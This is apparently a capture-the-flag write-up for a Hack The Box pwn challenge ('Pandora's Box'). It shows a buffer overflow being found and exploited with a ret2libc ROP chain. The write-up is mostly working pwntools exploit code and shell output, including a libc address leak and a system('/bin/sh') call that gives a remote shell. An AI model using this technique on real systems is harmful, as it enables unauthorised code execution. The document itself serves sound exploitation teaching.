Pandora's Box
9 minutes to read
We are given a 64-bit binary called pb
:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
Reverse engineering
We can use Ghidra to analyze the binary and look at the decompiled source code in C:
int main() {
setup();
cls();
banner();
box();
return 0;
}
Among others, this function calls box
:
void box() {
long num;
char data [32];
data._0_8_ = 0;
data._8_8_ = 0;
data._16_8_ = 0;
data._24_8_ = 0;
fwrite("This is one of Pandora\'s mythical boxes!\n\nWill you open it or Return it to the Library for analysis?\n\n1. Open.\n2. Return.\n\n>> ", 1, 0x7e, stdout);
num = read_num();
if (num != 2) {
fprintf(stdout,"%s\nWHAT HAVE YOU DONE?! WE ARE DOOMED!\n\n",&DAT_004021c7);
/* WARNING: Subroutine does not return */
exit(0x520);
}
fwrite("\nInsert location of the library: ", 1, 0x21, stdout);
fgets(data, 256, stdin);
fwrite("\nWe will deliver the mythical box to the Library for analysis, thank you!\n\n", 1, 0x4b, stdout);
return;
}
Buffer Overflow vulnerability
The binary is vulnerable to Buffer Overflow since there is a variable called data
that has 32 bytes assigned as buffer, but the program is reading up to 256 bytes from stdin
and storing the data into data
, overflowing the reserved buffer if the size of the input data is greater than 32 bytes.
We can check that it crashes in this situation (option 2
):
$ ./pb
βββββββββββββββββββ
β£ β£
β£ ββ β£
β£ βββββββββββββββ β£
β£ ββ β£
β£ β£
βββββββββββββββββββ
This is one of Pandora's mythical boxes!
Will you open it or Return it to the Library for analysis?
1. Open.
2. Return.
>> 2
Insert location of the library: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
We will deliver the mythical box to the Library for analysis, thank you!
zsh: segmentation fault (core dumped) ./pb
Due to the fact that it is a 64-bit binary without canary protection, the offset needed to overflow the buffer and reach the stack is 40 (because after the reserved 32 bytes, the old value of $rbp
is saved, and right after, the saved return address).
However, this time is a bit different. The best thing is to check the disassembly for box
:
$ objdump -M intel --disassemble=box pb
pb: file format elf64-x86-64
Disassembly of section .init:
Disassembly of section .plt:
Disassembly of section .text:
00000000004012c2 <box>:
4012c2: 55 push rbp
4012c3: 48 89 e5 mov rbp,rsp
4012c6: 48 83 ec 30 sub rsp,0x30
4012ca: 48 c7 45 d0 00 00 00 mov QWORD PTR [rbp-0x30],0x0
4012d1: 00
4012d2: 48 c7 45 d8 00 00 00 mov QWORD PTR [rbp-0x28],0x0
4012d9: 00
4012da: 48 c7 45 e0 00 00 00 mov QWORD PTR [rbp-0x20],0x0
4012e1: 00
4012e2: 48 c7 45 e8 00 00 00 mov QWORD PTR [rbp-0x18],0x0
4012e9: 00
4012ea: 48 8b 05 1f 2d 00 00 mov rax,QWORD PTR [rip+0x2d1f] # 404010 <stdout@@GLIBC_2.2.5>
...
40139e: e8 1d fd ff ff call 4010c0 <fwrite@plt>
4013a3: 90 nop
4013a4: c9 leave
4013a5: c3 ret
Disassembly of section .fini:
We see that there is 0x30
(48
) new space on the stack, plus 8 bytes for the saved $rbp
from the previous stack frame. After that, we will have the saved $rip
(return address), which we want to modify with the Buffer Overflow vulnerability. In total, we need 56 bytes to reach the position of the return address on the stack.
Exploit strategy
Since the binary has NX protection, we must use Return Oriented Programming (ROP) to execute arbitrary code. This technique makes use of gadgets, which are sets of instructions that end in ret
(usually). We can add a list of addresses for gadgets on the stack so that when a gadget is executed, it returns to the stack and executes the next gadget. That is the meaning of ROP chain.
This is a bypass for NX protection since we are not executing instructions in the stack (shellcode), but we are redirecting the program to specific addresses that are executable and run the instructions we want.
In order to gain code execution, we will perform a ret2libc attack. This technique consists of calling system
inside Glibc using "/bin/sh"
as first parameter to the function (which is also inside Glibc). The problem we must handle is ASLR, which is a protection set for shared libraries that randomize a base address.
Since we want to call system
and take "/bin/sh"
, we need to know the addresses of those values inside Glibc at runtime (these addresses will change in every execution). Hence, we must find a way to leak an address inside Glibc because the only thing that is random is the base address of Glibc; the rest of the addresses are computed as offsets to that base address.
The process of leaking a function comes with calling a function like puts
(or printf
or write
) using an address from the Global Offset Table (GOT) as first argument (for example, fprintf
). This table contains the real addresses of the external functions used by the program (if they have been resolved). Since puts
is used by the binary, to call it we can use the Procedure Linkage Table (PLT), which applies a jump instruction to the real address of puts
.
One more thing to consider is the use of gadgets. Because of the calling conventions for 64-bit binaries, when calling a function, the arguments must be stored in registers (in order: $rdi
, $rsi
, $rdx
, $rcx
…). For example, the instruction pop rdi
will take the next value from the stack and store it in $rdi
.
Exploit development
Nice, let’s start with the leakage process. These are the values we need:
- Address of
pop rdi; ret
gadget (0x40142b
):
$ ROPgadget --binary pb | grep 'pop rdi ; ret'
0x000000000040142b : pop rdi ; ret
- GOT addresses:
$ objdump -R pb
pb: file format elf64-x86-64
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
0000000000403ff0 R_X86_64_GLOB_DAT __libc_start_main@GLIBC_2.2.5
0000000000403ff8 R_X86_64_GLOB_DAT __gmon_start__
0000000000404010 R_X86_64_COPY stdout@@GLIBC_2.2.5
0000000000404020 R_X86_64_COPY stdin@@GLIBC_2.2.5
0000000000403fa0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
0000000000403fa8 R_X86_64_JUMP_SLOT printf@GLIBC_2.2.5
0000000000403fb0 R_X86_64_JUMP_SLOT alarm@GLIBC_2.2.5
0000000000403fb8 R_X86_64_JUMP_SLOT read@GLIBC_2.2.5
0000000000403fc0 R_X86_64_JUMP_SLOT fgets@GLIBC_2.2.5
0000000000403fc8 R_X86_64_JUMP_SLOT fprintf@GLIBC_2.2.5
0000000000403fd0 R_X86_64_JUMP_SLOT setvbuf@GLIBC_2.2.5
0000000000403fd8 R_X86_64_JUMP_SLOT strtoul@GLIBC_2.2.5
0000000000403fe0 R_X86_64_JUMP_SLOT exit@GLIBC_2.2.5
0000000000403fe8 R_X86_64_JUMP_SLOT fwrite@GLIBC_2.2.5
- Address of
puts
at the PLT (0x404030
):
$ objdump -M intel -d pb | grep puts@plt
0000000000401030 <puts@plt>:
40124a: e8 e1 fd ff ff call 401030 <puts@plt>
401261: e8 ca fd ff ff call 401030 <puts@plt>
40126d: e8 be fd ff ff call 401030 <puts@plt>
- Address of
main
(0x4013a6
):
$ objdump -M intel -d pb | grep '<main>'
00000000004013a6 <main>:
I have shown the manual approach to start the ret2libc exploit. However, I will be using pwntools
from now on.
Leaking memory addresses
We can use this Python script:
#!/usr/bin/env python3
from pwn import *
context.binary = elf = ELF('pb')
glibc = ELF('glibc/libc.so.6', checksec=False)
rop = ROP(elf)
def get_process():
if len(sys.argv) == 1:
return elf.process()
host, port = sys.argv[1].split(':')
return remote(host, port)
def main():
p = get_process()
offset = 56
junk = b'A' * offset
payload = junk
payload += p64(rop.rdi[0])
payload += p64(elf.got.fprintf)
payload += p64(elf.plt.puts)
payload += p64(elf.sym.main)
p.sendlineafter(b'>> ', b'2')
p.sendlineafter(b'Insert location of the library: ', payload)
p.interactive()
if __name__ == '__main__':
main()
Here we have leaked the address of fprintf
at runtime:
$ python3 solve.py
[*] './pb'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 143704
[*] Switching to interactive mode
We will deliver the mythical box to the Library for analysis, thank you!
\xb0\x16\xe9\x98
βββββββββββββββββββ
β£ β£
β£ ββ β£
β£ βββββββββββββββ β£
β£ ββ β£
β£ β£
βββββββββββββββββββ
This is one of Pandora's mythical boxes!
Will you open it or Return it to the Library for analysis?
1. Open.
2. Return.
>> $
We also see that we have returned to main
, which is necessary because we have to enter another payload without stopping the program.
Now we will to compute the base address of Glibc, which can be done with a simple computation. We can substract the offset of fprintf
to its real address so that we get the base address. Let’s take all the offsets needed:
- Offset of
fprintf
(0x606b0
):
$ readelf -s glibc/libc.so.6 | grep fprintf
174: 000000000005a4f0 11 FUNC GLOBAL DEFAULT 15 _IO_vfprintf@@GLIBC_2.2.5
731: 00000000000606b0 183 FUNC WEAK DEFAULT 15 _IO_fprintf@@GLIBC_2.2.5
734: 0000000000134e20 192 FUNC GLOBAL DEFAULT 15 __fprintf_chk@@GLIBC_2.3.4
778: 00000000000606b0 183 FUNC GLOBAL DEFAULT 15 fprintf@@GLIBC_2.2.5
1597: 000000000005a4f0 11 FUNC GLOBAL DEFAULT 15 vfprintf@@GLIBC_2.2.5
2683: 0000000000134f00 28 FUNC GLOBAL DEFAULT 15 __vfprintf_chk@@GLIBC_2.3.4
- Offset of
system
(0x50d60
):
$ readelf -s glibc/libc.so.6 | grep system
396: 0000000000050d60 45 FUNC GLOBAL DEFAULT 15 __libc_system@@GLIBC_PRIVATE
1481: 0000000000050d60 45 FUNC WEAK DEFAULT 15 system@@GLIBC_2.2.5
2759: 0000000000169140 103 FUNC GLOBAL DEFAULT 15 svcerr_systemerr@GLIBC_2.2.5
- Offset of
"/bin/sh"
(0x1d8698
):
$ strings -atx glibc/libc.so.6 | grep /bin/sh
1d8698 /bin/sh
Getting RCE
Then, we can compute the real addresses of system
and "/bin/sh"
at runtime because we have the base address of Glibc at runtime. Let’s check it out:
fprintf_addr = u64(p.recvline().strip().ljust(8, b'\0'))
p.info(f'Leaked fprintf() address: {hex(fprintf_addr)}')
glibc.address = fprintf_addr - glibc.sym.fprintf
p.info(f'Glibc base address: {hex(glibc.address)}')
$ python3 solve.py
[*] './pb'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 150949
[*] Leaked fprintf() address: 0x7f47e48ff6b0
[*] Glibc base address: 0x7f47e489f000
[*] Switching to interactive mode
βββββββββββββββββββ
β£ β£
β£ ββ β£
β£ βββββββββββββββ β£
β£ ββ β£
β£ β£
βββββββββββββββββββ
This is one of Pandora's mythical boxes!
Will you open it or Return it to the Library for analysis?
1. Open.
2. Return.
>> $
As a sanity check, we see that the base address of Glibc ends in 000
in hexadecimal, and that’s correct. Let’s finish the exploit:
payload = junk
payload += p64(rop.rdi[0])
payload += p64(next(glibc.search(b'/bin/sh')))
payload += p64(glibc.sym.system)
p.sendlineafter(b'>> ', b'2')
p.sendlineafter(b'Insert location of the library: ', payload)
p.recv()
p.interactive()
$ python3 solve.py
[*] './pb'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 151797
[*] Leaked fprintf() address: 0x7fdbb41c36b0
[*] Glibc base address: 0x7fdbb4163000
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
But it does not work (Got EOF while reading in interactive
). This might be a stack alignment issue (as in Labyrinth). A single ret
gadget before calling system
will do the trick (otherwise, we would need to use GDB to debug the exploit):
payload = junk
payload += p64(rop.rdi[0])
payload += p64(next(glibc.search(b'/bin/sh')))
payload += p64(rop.ret[0])
payload += p64(glibc.sym.system)
And now it works correctly:
$ python3 solve.py
[*] './pb'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 154943
[*] Leaked fprintf() address: 0x7fe5fb7d36b0
[*] Glibc base address: 0x7fe5fb773000
[*] Switching to interactive mode
$ ls
flag.txt glibc pb solve.py
$ cat flag.txt
HTB{f4k3_fl4g_4_t35t1ng}
Flag
So, let’s try remotely:
$ python3 solve.py 165.232.98.11:30618
[*] './pb'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Opening connection to 165.232.98.11 on port 30618: Done
[*] Leaked fprintf() address: 0x7f0b43b8a6b0
[*] Glibc base address: 0x7f0b43b2a000
[*] Switching to interactive mode
$ ls
core
flag.txt
glibc
pb
$ cat flag.txt
HTB{r3turn_2_P4nd0r4?!}
The full exploit code is here: solve.py
.